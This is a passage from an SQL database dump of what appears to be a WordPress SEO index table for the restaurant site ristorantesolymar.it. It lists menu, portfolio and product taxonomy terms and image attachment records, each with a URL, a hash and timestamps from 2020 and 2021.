14:42:57',1,NULL,NULL,NULL,NULL,0,NULL),(424,'https://www.ristorantesolymar.it/vecchio/restaurant-menu-category/appetizers/','77:964162c348a5e6173c6364224092959a',40,'term','restaurant-menu-category',NULL,NULL,NULL,NULL,'Appetizers',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-04 16:52:03',1,NULL,NULL,NULL,NULL,0,NULL),(425,'https://www.ristorantesolymar.it/vecchio/restaurant-menu-category/beer/','71:43848b5701ff2f2e5eba57901eecaca8',41,'term','restaurant-menu-category',NULL,NULL,NULL,NULL,'Beer',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-04 16:51:51',1,NULL,NULL,NULL,NULL,0,NULL),(426,'https://www.ristorantesolymar.it/vecchio/portfolio-category/cake/','65:4e6d88ecfc19961613c0442f809b108a',42,'term','portfolio-category',NULL,NULL,NULL,NULL,'Cake',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-05 00:58:50',1,NULL,NULL,NULL,NULL,0,NULL),(427,'https://www.ristorantesolymar.it/vecchio/restaurant-menu-category/cocktails/','76:e300a74e5eeefcac1c9e4d81792912ab',43,'term','restaurant-menu-category',NULL,NULL,NULL,NULL,'Cocktails',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-04 16:52:27',1,NULL,NULL,NULL,NULL,0,NULL),(428,'https://www.ristorantesolymar.it/vecchio/portfolio-category/dessert/','68:be6e5aeff159b590e04b2190ebf7f5b4',44,'term','portfolio-category',NULL,NULL,NULL,NULL,'Dessert',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-18 13:05:25',1,NULL,NULL,NULL,NULL,0,NULL),(429,'https://www.ristorantesolymar.it/vecchio/restaurant-menu-category/desserts/','75:d3b8b005bf2665b07c00944d408f5918',45,'term','restaurant-menu-category',NULL,NULL,NULL,NULL,'Desserts',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-04 16:52:23',1,NULL,NULL,NULL,NULL,0,NULL),(430,'https://www.ristorantesolymar.it/vecchio/restaurant-menu-category/drink/','72:ae6f83ccd1f5348ce3afdf9a7db062a9',46,'term','restaurant-menu-category',NULL,NULL,NULL,NULL,'Drink',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-07 04:59:52',1,NULL,NULL,NULL,NULL,0,NULL),(431,'https://www.ristorantesolymar.it/vecchio/tag-prodotto/food/','59:31d9bb79c5c09488ef2e47f36e440157',47,'term','product_tag',NULL,NULL,NULL,NULL,'Food',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-08 07:44:54',1,NULL,NULL,NULL,NULL,0,NULL),(432,'https://www.ristorantesolymar.it/vecchio/portfolio-category/food/','65:bdefeb180fbd54633567aea6a2701f98',48,'term','portfolio-category',NULL,NULL,NULL,NULL,'Food',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,6,NULL,'2020-12-05 16:04:01','2021-01-31 22:09:13',1,NULL,NULL,NULL,NULL,0,NULL),(433,'https://www.ristorantesolymar.it/vecchio/portfolio-tag/food/','60:716b427e4b6531a5066866b333a4aa22',49,'term','portfolio-tag',NULL,NULL,NULL,NULL,'Food',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-19 00:00:20',1,NULL,NULL,NULL,NULL,0,NULL),(434,'https://www.ristorantesolymar.it/vecchio/portfolio-category/gourmet/','68:3b830cb64f67723e7a00a9ec64764427',50,'term','portfolio-category',NULL,NULL,NULL,NULL,'Gourmet',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-07 00:33:31',1,NULL,NULL,NULL,NULL,0,NULL),(435,'https://www.ristorantesolymar.it/vecchio/portfolio-category/homemade/','69:ea486647ccef450ed0982b2d79785cc8',51,'term','portfolio-category',NULL,NULL,NULL,NULL,'Homemade',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-05 00:59:48',1,NULL,NULL,NULL,NULL,0,NULL),(436,'https://www.ristorantesolymar.it/vecchio/portfolio-category/kitchen/','68:9990357b04b29b6b22f30ee1bbaecda6',52,'term','portfolio-category',NULL,NULL,NULL,NULL,'Kitchen',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-05 00:59:37',1,NULL,NULL,NULL,NULL,1,NULL),(437,'https://www.ristorantesolymar.it/vecchio/restaurant-menu-category/maindish/','75:169e2abe0ed60fc77c8a2e85d77c42f9',53,'term','restaurant-menu-category',NULL,NULL,NULL,NULL,'Main Dish',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-03-09 18:00:04',1,NULL,NULL,NULL,NULL,0,NULL),(438,'https://www.ristorantesolymar.it/vecchio/portfolio-category/meals/','66:7c522f7505ea53b88cd513a0d3dc51ef',54,'term','portfolio-category',NULL,NULL,NULL,NULL,'Meals',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-05 00:58:50',1,NULL,NULL,NULL,NULL,1,NULL),(439,NULL,NULL,55,'term','restaurant-menu-category',NULL,NULL,NULL,NULL,'Meals',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(440,'https://www.ristorantesolymar.it/vecchio/portfolio-category/new/','64:d235817fa5c6effbf4aaf5f8edc4fbf5',56,'term','portfolio-category',NULL,NULL,NULL,NULL,'New',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-05 00:59:41',1,NULL,NULL,NULL,NULL,1,NULL),(441,'https://www.ristorantesolymar.it/vecchio/tag-prodotto/new-dish/','63:02ec7b15796ee69675c7e3d83099ffa5',57,'term','product_tag',NULL,NULL,NULL,NULL,'New Dish',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-05 03:28:11',1,NULL,NULL,NULL,NULL,0,NULL),(442,'https://www.ristorantesolymar.it/vecchio/portfolio-tag/nice/','60:749b3f7ceff3bed1656e68be2737d0bc',58,'term','portfolio-tag',NULL,NULL,NULL,NULL,'Nice',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-19 19:25:59',1,NULL,NULL,NULL,NULL,0,NULL),(443,'https://www.ristorantesolymar.it/vecchio/tag-prodotto/specials/','63:c31688fbd91d7faeb1aa45eb368b7194',59,'term','product_tag',NULL,NULL,NULL,NULL,'Specials',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-05 03:28:14',1,NULL,NULL,NULL,NULL,0,NULL),(444,'https://www.ristorantesolymar.it/vecchio/portfolio-category/taste/','66:37f9918ff7ac558f6ea8ea8ba358aad1',60,'term','portfolio-category',NULL,NULL,NULL,NULL,'Taste',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-05 00:58:47',1,NULL,NULL,NULL,NULL,1,NULL),(445,'https://www.ristorantesolymar.it/vecchio/testimonials-category/testimonials-1/','78:e6ae06153b07ba1f2b373f125a4498aa',61,'term','testimonials-category',NULL,NULL,NULL,NULL,'Testimonials-1',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-03-22 16:44:11',1,NULL,NULL,NULL,NULL,0,NULL),(446,NULL,NULL,62,'term','product_cat',NULL,NULL,NULL,NULL,'Uncategorized',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(447,'https://www.ristorantesolymar.it/vecchio/tag-prodotto/vegan/','60:ced519f8f20f493c209e2582e7f613a4',63,'term','product_tag',NULL,NULL,NULL,NULL,'Vegan',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-07 16:31:42',1,NULL,NULL,NULL,NULL,0,NULL),(448,'https://www.ristorantesolymar.it/vecchio/restaurant-menu-category/wine/','71:4451bb9c97924315e07f861ad19d2776',64,'term','restaurant-menu-category',NULL,NULL,NULL,NULL,'Wine',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-01 05:20:57',1,NULL,NULL,NULL,NULL,0,NULL),(449,'https://www.ristorantesolymar.it/vecchio/categoria-prodotto/brunch/','67:fcaf369cec6fc210b064e5fe2c7e7057',65,'term','product_cat',NULL,NULL,NULL,NULL,'Brunch',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-16 20:39:18',1,NULL,NULL,NULL,NULL,0,NULL),(450,'https://www.ristorantesolymar.it/vecchio/categoria-prodotto/food/','65:2e53c0b0e606f4c6918e712056fc421b',66,'term','product_cat',NULL,NULL,NULL,NULL,'Food',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-24 16:53:27',1,NULL,NULL,NULL,NULL,0,NULL),(451,'https://www.ristorantesolymar.it/vecchio/categoria-prodotto/main-dish/','70:0b2eba877eb65f2d59937ee3e42a69b5',67,'term','product_cat',NULL,NULL,NULL,NULL,'Main Dish',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-01-31 21:54:11',1,NULL,NULL,NULL,NULL,0,NULL),(452,'https://www.ristorantesolymar.it/vecchio/categoria-prodotto/recepies/','69:3506263ad7bcc1ba543ae2841a673791',68,'term','product_cat',NULL,NULL,NULL,NULL,'Recepies',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-01 18:42:40',1,NULL,NULL,NULL,NULL,0,NULL),(453,'https://www.ristorantesolymar.it/vecchio/categoria-prodotto/restaurants/','72:1bf94087d32784e31791d4abe7d52c0e',69,'term','product_cat',NULL,NULL,NULL,NULL,'Restaurants',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-01 15:58:07',1,NULL,NULL,NULL,NULL,0,NULL),(2086,NULL,NULL,4239,'post','attachment',1,0,NULL,NULL,'blog-post-img-5','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/blog-post-img-5.jpg',NULL,'4239','attachment-image',NULL,NULL,NULL,'4239','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:54','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2087,NULL,NULL,4240,'post','attachment',1,0,NULL,NULL,'shop-img-12','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-12.jpg',NULL,'4240','attachment-image',NULL,NULL,NULL,'4240','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:54','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2088,NULL,NULL,4241,'post','attachment',1,0,NULL,NULL,'map-pin','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/map-pin.png',NULL,'4241','attachment-image',NULL,NULL,NULL,'4241','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:54','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2089,NULL,NULL,4242,'post','attachment',1,0,NULL,NULL,'shop-img-30','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-30.jpg',NULL,'4242','attachment-image',NULL,NULL,NULL,'4242','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:54','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2090,NULL,NULL,4243,'post','attachment',1,0,NULL,NULL,'accolades-right-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/accolades-right-img.jpg',NULL,'4243','attachment-image',NULL,NULL,NULL,'4243','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:54','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2091,NULL,NULL,282,'post','attachment',1,0,NULL,NULL,'shop-img-23','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-23.jpg',NULL,'282','attachment-image',NULL,NULL,NULL,'282','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:54','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2092,NULL,NULL,4244,'post','attachment',1,0,NULL,NULL,'shop-sidebar-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-sidebar-img.jpg',NULL,'4244','attachment-image',NULL,NULL,NULL,'4244','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:56','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2093,NULL,NULL,4245,'post','attachment',1,0,NULL,NULL,'autor-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/autor-img.png',NULL,'4245','attachment-image',NULL,NULL,NULL,'4245','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:56','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2094,NULL,NULL,4246,'post','attachment',1,0,NULL,NULL,'h1-port-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-port-img-1.jpg',NULL,'4246','attachment-image',NULL,NULL,NULL,'4246','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:58','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2095,NULL,NULL,4247,'post','attachment',1,0,NULL,NULL,'shop-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-1.jpg',NULL,'4247','attachment-image',NULL,NULL,NULL,'4247','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:58','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2096,NULL,NULL,4248,'post','attachment',1,0,NULL,NULL,'port-single-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/port-single-img-1-1.jpg',NULL,'4248','attachment-image',NULL,NULL,NULL,'4248','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:58','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2097,NULL,NULL,4249,'post','attachment',1,0,NULL,NULL,'footer-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/footer-img-1.png',NULL,'4249','attachment-image',NULL,NULL,NULL,'4249','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:58','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2098,NULL,NULL,703,'post','attachment',1,0,NULL,NULL,'accolades-content-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/accolades-content-img.jpg',NULL,'703','attachment-image',NULL,NULL,NULL,'703','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:58','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2099,NULL,NULL,4250,'post','attachment',1,0,NULL,NULL,'h1-img-10','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-10.jpg',NULL,'4250','attachment-image',NULL,NULL,NULL,'4250','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:53:59','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2100,NULL,NULL,4251,'post','attachment',1,0,NULL,NULL,'chef-bio-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/chef-bio-img.jpg',NULL,'4251','attachment-image',NULL,NULL,NULL,'4251','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2101,NULL,NULL,4252,'post','attachment',1,0,NULL,NULL,'pin-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/pin-img-1.png',NULL,'4252','attachment-image',NULL,NULL,NULL,'4252','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2102,NULL,NULL,4253,'post','attachment',1,0,NULL,NULL,'h1-img-12','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-img-12.jpg',NULL,'4253','attachment-image',NULL,NULL,NULL,'4253','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2103,NULL,NULL,39,'post','attachment',1,0,NULL,NULL,'shop-img-2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-2.jpg',NULL,'39','attachment-image',NULL,NULL,NULL,'39','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2104,NULL,NULL,4254,'post','attachment',1,0,NULL,NULL,'h1-img-11','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-11.jpg',NULL,'4254','attachment-image',NULL,NULL,NULL,'4254','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:01','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2105,NULL,NULL,4255,'post','attachment',1,0,NULL,NULL,'h1-port-img-2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-port-img-2.jpg',NULL,'4255','attachment-image',NULL,NULL,NULL,'4255','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:01','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2106,NULL,NULL,4256,'post','attachment',1,0,NULL,NULL,'port-single-img-2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/port-single-img-2-1.jpg',NULL,'4256','attachment-image',NULL,NULL,NULL,'4256','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:01','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2107,NULL,NULL,4257,'post','attachment',1,0,NULL,NULL,'drink-menu-backround','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/drink-menu-backround.jpg',NULL,'4257','attachment-image',NULL,NULL,NULL,'4257','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:02','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2108,NULL,NULL,4258,'post','attachment',1,0,NULL,NULL,'shop-img-3','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-3.jpg',NULL,'4258','attachment-image',NULL,NULL,NULL,'4258','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:04','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2109,NULL,NULL,4259,'post','attachment',1,0,NULL,NULL,'shop-img-14','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-14.jpg',NULL,'4259','attachment-image',NULL,NULL,NULL,'4259','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:04','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2110,NULL,NULL,4260,'post','attachment',1,0,NULL,NULL,'chef-bio-left-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/chef-bio-left-img.png',NULL,'4260','attachment-image',NULL,NULL,NULL,'4260','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:04','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2111,NULL,NULL,4261,'post','attachment',1,0,NULL,NULL,'h1-port-img-3','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-port-img-3.jpg',NULL,'4261','attachment-image',NULL,NULL,NULL,'4261','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:05','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2112,NULL,NULL,4262,'post','attachment',1,0,NULL,NULL,'chef-bio-content-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/chef-bio-content-img.jpg',NULL,'4262','attachment-image',NULL,NULL,NULL,'4262','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:07','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2113,NULL,NULL,4263,'post','attachment',1,0,NULL,NULL,'port-single-img-3','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/port-single-img-3.jpg',NULL,'4263','attachment-image',NULL,NULL,NULL,'4263','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:07','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2114,NULL,NULL,4264,'post','attachment',1,0,NULL,NULL,'shop-img-15','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-15.jpg',NULL,'4264','attachment-image',NULL,NULL,NULL,'4264','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:07','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2115,NULL,NULL,41,'post','attachment',1,0,NULL,NULL,'shop-img-4','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-4.jpg',NULL,'41','attachment-image',NULL,NULL,NULL,'41','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:07','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2116,NULL,NULL,4265,'post','attachment',1,0,NULL,NULL,'food-menu-backround','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/food-menu-backround.jpg',NULL,'4265','attachment-image',NULL,NULL,NULL,'4265','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:07','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2117,NULL,NULL,4266,'post','attachment',1,0,NULL,NULL,'h1-img-5','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-5.jpg',NULL,'4266','attachment-image',NULL,NULL,NULL,'4266','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:07','2021-01-29 